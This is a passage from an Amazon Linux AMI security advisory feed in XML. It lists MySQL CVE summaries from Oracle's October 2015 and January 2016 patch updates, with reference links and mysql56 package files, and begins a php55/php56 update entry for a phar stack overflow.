Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301510:
CVE-2016-0616 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0611:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301509:
CVE-2016-0611 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0610:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and MariaDB before 10.0.22 and 10.1.x before 10.1.9 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301508:
CVE-2016-0610 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0609:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to privileges.
1301507:
CVE-2016-0609 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU January 2016)
CVE-2016-0608:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to UDF.
1301506:
CVE-2016-0608 mysql: unspecified vulnerability in subcomponent: Server: UDF (CPU January 2016)
CVE-2016-0607:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to replication.
1301505:
CVE-2016-0607 mysql: unspecified vulnerability in subcomponent: Server: Replication (CPU January 2016)
CVE-2016-0606:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect integrity via unknown vectors related to encryption.
1301504:
CVE-2016-0606 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU January 2016)
CVE-2016-0605:
Unspecified vulnerability in Oracle MySQL 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors.
1301503:
CVE-2016-0605 mysql: unspecified vulnerability in subcomponent: Server: General (CPU January 2016)
CVE-2016-0601:
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Partition.
1301502:
CVE-2016-0601 mysql: unspecified vulnerability in subcomponent: Server: Partition (CPU January 2016)
CVE-2016-0600:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301501:
CVE-2016-0600 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0599:
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301500:
CVE-2016-0599 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0598:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301498:
CVE-2016-0598 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0597:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301497:
CVE-2016-0597 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0596:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and 5.6.27 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301496:
CVE-2016-0596 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0595:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1301495:
CVE-2016-0595 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0594:
Unspecified vulnerability in Oracle MySQL 5.6.21 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1301494:
CVE-2016-0594 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0546:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client.
1301493:
CVE-2016-0546 mysql: unspecified vulnerability in subcomponent: Client (CPU January 2016)
CVE-2016-0505:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.
1301492:
CVE-2016-0505 mysql: unspecified vulnerability in subcomponent: Server: Options (CPU January 2016)
CVE-2016-0504:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2016-0503.
1301491:
CVE-2016-0504 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0503:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2016-0504.
1301490:
CVE-2016-0503 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0502:
Unspecified vulnerability in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301489:
CVE-2016-0502 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2015-7744:
wolfSSL (formerly CyaSSL) before 3.6.8 does not properly handle faults associated with the Chinese Remainder Theorem (CRT) process when allowing ephemeral key exchange without low memory optimizations on a server, which makes it easier for remote attackers to obtain private RSA keys by capturing TLS handshakes, aka a Lenstra attack.
1301488:
CVE-2015-7744 yaSSL, wolfSSL: insufficient hardening of RSA-CRT implementation (Oracle MySQL CPU Jan 2016)
CVE-2015-4913:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML, a different vulnerability than CVE-2015-4858.
1274794:
CVE-2015-4913 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4910:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached.
1274792:
CVE-2015-4910 mysql: unspecified vulnerability related to Server:Memcached (CPU October 2015)
CVE-2015-4905:
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML.
1274790:
CVE-2015-4905 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4904:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to libmysqld.
1274787:
CVE-2015-4904 mysql: unspecified vulnerability related to libmysqld (CPU October 2015)
CVE-2015-4895:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274786:
CVE-2015-4895 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4890:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Replication.
1274785:
CVE-2015-4890 mysql: unspecified vulnerability related to Server:Replication (CPU October 2015)
CVE-2015-4879:
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier, and 5.6.25 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to DML.
1274783:
CVE-2015-4879 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4870:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.
1274781:
CVE-2015-4870 mysql: unspecified vulnerability related to Server:Parser (CPU October 2015)
CVE-2015-4866:
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274780:
CVE-2015-4866 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4864:
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
1274779:
CVE-2015-4864 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4862:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1274778:
CVE-2015-4862 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4861:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274776:
CVE-2015-4861 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4858:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2015-4913.
1274773:
CVE-2015-4858 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4836:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP.
1274771:
CVE-2015-4836 mysql: unspecified vulnerability related to Server:SP (CPU October 2015)
CVE-2015-4833:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
1274770:
CVE-2015-4833 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4830:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
1274767:
CVE-2015-4830 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4826:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types.
1274766:
CVE-2015-4826 mysql: unspecified vulnerability related to Server:Types (CPU October 2015)
CVE-2015-4819:
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier, and 5.6.25 and earlier, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client programs.
1274764:
CVE-2015-4819 mysql: unspecified vulnerability related to Client programs (CPU October 2015)
CVE-2015-4815:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL.
1274759:
CVE-2015-4815 mysql: unspecified vulnerability related to Server:DDL (CPU October 2015)
CVE-2015-4807:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache.
1274758:
CVE-2015-4807 mysql: unspecified vulnerability related to Server:Query Cache (CPU October 2015)
CVE-2015-4802:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792.
1274756:
CVE-2015-4802 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4800:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
1274754:
CVE-2015-4800 mysql: unspecified vulnerability related to Server:Optimizer (CPU October 2015)
CVE-2015-4792:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802.
1274752:
CVE-2015-4792 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4791:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges.
1274749:
CVE-2015-4791 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4766:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect availability via unknown vectors related to Server : Security : Firewall.
1274748:
CVE-2015-4766 mysql: unspecified vulnerability related to Server:Security:Firewall (CPU October 2015)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4766" title="" id="CVE-2015-4766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4791" title="" id="CVE-2015-4791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4792" title="" id="CVE-2015-4792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4800" title="" id="CVE-2015-4800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4802" title="" id="CVE-2015-4802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4807" title="" id="CVE-2015-4807" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4815" title="" id="CVE-2015-4815" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4819" title="" id="CVE-2015-4819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4826" title="" id="CVE-2015-4826" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4830" title="" id="CVE-2015-4830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4833" title="" id="CVE-2015-4833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4836" title="" id="CVE-2015-4836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4858" title="" id="CVE-2015-4858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4861" title="" id="CVE-2015-4861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4862" title="" id="CVE-2015-4862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4864" title="" id="CVE-2015-4864" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4866" title="" id="CVE-2015-4866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4870" title="" id="CVE-2015-4870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4879" title="" id="CVE-2015-4879" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4890" title="" id="CVE-2015-4890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4895" title="" id="CVE-2015-4895" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4904" title="" id="CVE-2015-4904" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4905" title="" id="CVE-2015-4905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4910" title="" id="CVE-2015-4910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4913" title="" id="CVE-2015-4913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7744" title="" id="CVE-2015-7744" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0502" title="" id="CVE-2016-0502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0503" title="" id="CVE-2016-0503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0504" title="" id="CVE-2016-0504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0505" title="" id="CVE-2016-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0546" title="" id="CVE-2016-0546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0594" title="" id="CVE-2016-0594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0595" title="" id="CVE-2016-0595" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0596" title="" id="CVE-2016-0596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0597" title="" id="CVE-2016-0597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0598" title="" id="CVE-2016-0598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0599" title="" id="CVE-2016-0599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0600" title="" id="CVE-2016-0600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0601" title="" id="CVE-2016-0601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0605" title="" id="CVE-2016-0605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0606" title="" id="CVE-2016-0606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0607" title="" id="CVE-2016-0607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0608" title="" id="CVE-2016-0608" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0609" title="" id="CVE-2016-0609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0610" title="" id="CVE-2016-0610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0611" title="" id="CVE-2016-0611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0616" title="" id="CVE-2016-0616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.29-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-685</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-685: medium priority package update for php56 php55</title><issued date="2016-04-13 11:45:00" /><updated date="2016-04-13 11:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2554:
1305543:
CVE-2016-2554 php: Stack overflow vulnerability when decompressing tar phar archives
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2554" title="" id="CVE-2016-2554" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-tidy" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.33" 